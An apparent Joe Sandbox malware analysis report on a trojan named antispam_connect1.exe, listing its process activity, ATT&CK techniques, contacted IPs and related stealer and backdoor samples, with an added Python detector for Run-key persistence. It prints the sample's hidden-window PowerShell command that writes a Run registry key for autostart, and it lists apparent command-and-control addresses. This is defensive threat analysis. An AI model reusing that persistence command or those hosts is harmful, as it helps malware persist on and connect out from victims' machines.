        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Code function: 2_2_048F6D40 pushfd ; iretd 2_2_048F6D4D
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run App
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run App
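The persistence chain the report records, both in the process-creation entries earlier in this section and in the Run value written just above (the sample launches a hidden-window PowerShell that writes HKCU\...\CurrentVersion\Run\App pointing back at its own path, so no elevation is needed), is the pattern an autorun-key detection keys on. The following Python is an added example, not part of the Joe Sandbox report: it scores constructed Sysmon Event ID 1 style records for that chain (a Run-key write verb, a hidden window request, a parent image running from a user-writable path, an unusually long PowerShell command line) and extracts the autostart target for triage. The event records, field names, weights and the 200-character length cut-off are assumptions chosen for illustration; the first record reproduces the command line the report shows.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed Sysmon Event ID 1 style records (ParentImage / Image / CommandLine).
# Not lines from the report: the first copies the command line the report shows,
# the second is a benign control, the third is a reg.exe variant of the same write.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Users\user\Desktop\antispam_connect1.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            r'powershell -WindowStyle hidden -Command "if (-Not (Test-Path '
            r'\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) '
            r'{ Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" '
            r'-Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"'
        ),
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -NoProfile -Command Get-ChildItem C:\Temp",
    },
    {
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\reg.exe",
        "CommandLine": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\user\AppData\Local\u.exe",
    },
]

# All patterns run over the normalised (lower-case, single-backslash) command line.
RUN_KEY = re.compile(r"software\\microsoft\\windows\\currentversion\\run(?:once)?\b")
WRITE_VERB = re.compile(r"\b(?:set-itemproperty|new-itemproperty|new-item|reg(?:\.exe)?\s+add|regwrite|setvalue)\b")
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden\b")          # -WindowStyle hidden, -w hidden, ...
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(?:desktop|downloads|appdata|documents)\\|\\temp\\|\\programdata\\")
AUTORUN_TARGET = re.compile(r'(?:-value|/d)\s+"?([a-z]:\\[^"\s]+)')


@dataclass
class Finding:
    image: str
    parent: str
    target: Optional[str]
    score: int
    reasons: List[str] = field(default_factory=list)


def normalize(cmdline: str) -> str:
    """Strip the \\" and doubled-backslash escaping seen in the report so one regex
    matches the PowerShell form and the reg.exe form alike."""
    s = cmdline.replace('\\"', '"')
    s = re.sub(r"\\+", r"\\", s)
    return s.lower()


def evaluate(event: dict) -> Optional[Finding]:
    cmd = normalize(event["CommandLine"])
    if not (RUN_KEY.search(cmd) and WRITE_VERB.search(cmd)):
        return None                                   # only autostart writers matter here
    reasons = ["writes a CurrentVersion\\Run autostart value"]
    score = 50
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window requested")
        score += 20
    if USER_WRITABLE.search(event["ParentImage"].lower() + "\\"):
        reasons.append("parent image runs from a user-writable path")
        score += 20
    if "powershell" in event["Image"].lower() and len(event["CommandLine"]) > 200:
        reasons.append("unusually long PowerShell command line")
        score += 10
    m = AUTORUN_TARGET.search(cmd)
    return Finding(event["Image"], event["ParentImage"], m.group(1) if m else None, score, reasons)


def scan(events: list) -> List[Finding]:
    """Return one Finding per event that writes an autostart value, in input order."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.score, f.image, "->", f.target, "|", "; ".join(f.reasons))
```

Scoring rather than a single regex keeps an administrator's interactive Run-key edit (the reg.exe record, parent cmd.exe under System32) at a lower tier than the sandbox's chain, which collects every weight. On a real host the process-creation match should be joined with the registry value-set event on the same key (Sysmon Event ID 13), which is the counterpart of the two "Registry value created or modified" entries above, to confirm the write landed; the extracted target path is then the file to collect.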
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process information set: NOOPENFILEERRORBOX (80 identical entries)
        Source: C:\Windows\System32\conhost.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\antispam_connect1.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process information set: NOOPENFILEERRORBOX (54 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\antispam_connect1.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2461
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1695
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2328
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1512
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3080
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388 Thread sleep count: 2461 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096 Thread sleep count: 1695 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 320 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1020 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2884 Thread sleep count: 2328 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2944 Thread sleep count: 1512 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6528 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3808 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5316 Thread sleep count: 3080 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5316 Thread sleep count: 278 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2020 Thread sleep time: -922337203685477s >= -30000s
        Source: antispam_connect1.exe, 00000008.00000002.3373123002.0000000003DC5000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: IUtREVuK.Ga1rqvmcIJ
        Source: antispam_connect1.exe, 00000005.00000002.3372146254.0000000001598000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
        Source: antispam_connect1.exe, 00000008.00000002.3370996963.0000000000968000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: antispam_connect1.exe, 00000000.00000002.3372457695.000000000197E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\antispam_connect1.exe Code function: 0_2_036D4800 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\antispam_connect1.exe Code function: 5_2_030B4800 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\antispam_connect1.exe Code function: 8_2_02D84800 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\antispam_connect1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exe Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 0_2_00D563A9 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D563A9

        Stealing of Sensitive Information

Source: Yara match, File source: Process Memory Space: antispam_connect1.exe PID: 5024, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: antispam_connect1.exe PID: 1600, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: antispam_connect1.exe PID: 1900, type: MEMORYSTR

        Remote Access Functionality

Source: Yara match, File source: Process Memory Space: antispam_connect1.exe PID: 5024, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: antispam_connect1.exe PID: 1600, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: antispam_connect1.exe PID: 1900, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count shown in that cell of the original matrix)

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
• Execution: 1 Command and Scripting Interpreter; 1 PowerShell; At; Cron; Launchd; Scheduled Task
• Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
• Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
• Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
• Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
• Discovery: 1 System Time Discovery; 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 12 System Information Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
• Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
• Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; 1 Proxy; Multiband Communication
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

Source | Detection | Scanner | Label | Link
antispam_connect1.exe | 100% | Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
        No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://93.185.159.253/ | false |  | unknown
http://188.130.206.243/ | false |  | unknown
http://46.8.232.106/ | false |  | unknown
http://46.8.236.61/ | false |  | unknown
http://91.212.166.91/ | false |  | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2182621146.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2350825775.0000000006577000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.mic | powershell.exe, 00000009.00000002.2415769151.0000000000816000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://188.130.206.243 | antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://aka.ms/pscore6lBeq | powershell.exe, 00000002.00000002.2179126154.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2342214016.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2417908077.00000000046B1000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://www.microsoft.co | powershell.exe, 00000002.00000002.2178335062.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://contoso.com/License | powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://93.185.159.253 | antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://46.8.236.61 | antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.2417908077.0000000004801000.00000004.00000800.00020000.00000000.sdmp | false |  | unknown
http://91.212.166.91 | antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://46.8.232.106 | antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://188.130.206.243http://46.8.232.106 | antispam_connect1.exe, 00000008.00000002.3375163956.000000000C89C000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
https://contoso.com/ | powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2182621146.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2350825775.0000000006577000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2433230502.000000000571E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://91.212.166.91http://46.8.232.106 | antispam_connect1.exe, 00000000.00000002.3374772415.000000000D042000.00000004.00001000.00020000.00000000.sdmp, antispam_connect1.exe, 00000000.00000002.3374772415.000000000D044000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2179126154.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2342214016.0000000005511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2417908077.00000000046B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://91.212.166.91C: | antispam_connect1.exe, 00000000.00000002.3374772415.000000000D044000.00000004.00001000.00020000.00000000.sdmp | false |  | unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
188.130.206.243 | unknown | Russian Federation | 200509 | SVINT-ASNES | false
93.185.159.253 | unknown | Russian Federation | 39912 | I3B-ASAT | false
91.212.166.91 | unknown | United Kingdom | 35819 | MOBILY-AS Etihad Etisalat Company Mobily SA | false
109.172.88.38 | unknown | Russian Federation | 41691 | SUMTEL-AS-RIPE Moscow Russia RU | true
46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1533403
                                            Start date and time:2024-10-14 17:21:12 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 7s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:antispam_connect1.exe
                                            Detection:MAL
                                            Classification:mal84.troj.evad.winEXE@12/8@0/6
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 67%
                                            • Number of executed functions: 9
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 5420 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                            • VT rate limit hit for: antispam_connect1.exe
Time | Type | Description
11:22:18 | API Interceptor | 9x Sleep call for process: powershell.exe modified
17:22:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\Desktop\antispam_connect1.exe
17:22:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Users\user\Desktop\antispam_connect1.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 46.8.232.106
• wa_3rd_party_host_32.exe | malicious | GO Backdoor | context: 46.8.232.106/
• wa_3rd_party_host_32.exe | malicious | GO Backdoor | context: 46.8.232.106/
• 5ndBtx7pRX.exe | malicious | GO Backdoor | context: 46.8.232.106/
• 5ndBtx7pRX.exe | malicious | GO Backdoor | context: 46.8.232.106/
• GoogleInstaller.exe | malicious | GO Backdoor | context: 46.8.232.106/
• GoogleInstaller.exe | malicious | GO Backdoor | context: 46.8.232.106/

Match: 93.185.159.253
• wa_3rd_party_host_32.exe | malicious | GO Backdoor | context: 93.185.159.253/
• wa_3rd_party_host_32.exe | malicious | GO Backdoor | context: 93.185.159.253/
• 5ndBtx7pRX.exe | malicious | GO Backdoor | context: 93.185.159.253/
• 5ndBtx7pRX.exe | malicious | GO Backdoor | context: 93.185.159.253/
• GoogleInstaller.exe | malicious | GO Backdoor | context: 93.185.159.253/
                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: SVINT-ASNES
• na.elf | malicious | Mirai, Moobot | context: 188.130.200.140

Match: FIORD-AS IP-transit operator in Russia Ukraine and Baltics
• wa_3rd_party_host_32.exe | malicious | GO Backdoor | context: 46.8.236.61
• wa_3rd_party_host_32.exe | malicious | GO Backdoor | context: 46.8.236.61
• 2efOvyn28p.exe | malicious | Stealc, Vidar | context: 46.8.231.109
• 20fUAMt5dL.exe | malicious | LummaC, Stealc, Vidar | context: 46.8.231.109
• SKGOzZRZGX.exe | malicious | Stealc | context: 46.8.231.109
• SecuriteInfo.com.Trojan.DownLoader47.43340.12576.1316.exe | malicious | Stealc | context: 46.8.231.109
• lihZ6gUU7V.exe | malicious | LummaC, Stealc, Vidar | context: 46.8.231.109
• FdjDPFGTZS.exe | malicious | LummaC, Stealc, Vidar | context: 46.8.231.109
• 45Ywq5ad5H.exe | malicious | LummaC, Stealc, Vidar | context: 46.8.231.109
• NdSXVNeoET.exe | malicious | LummaC, Stealc, Vidar | context: 46.8.231.109

Match: MOBILY-AS Etihad Etisalat Company Mobily SA
• na.elf | malicious | Mirai, Moobot | context: 176.18.57.22
• na.elf | malicious | Mirai, Moobot | context: 37.16.45.237
• na.elf | malicious | Mirai, Moobot | context: 176.225.179.248
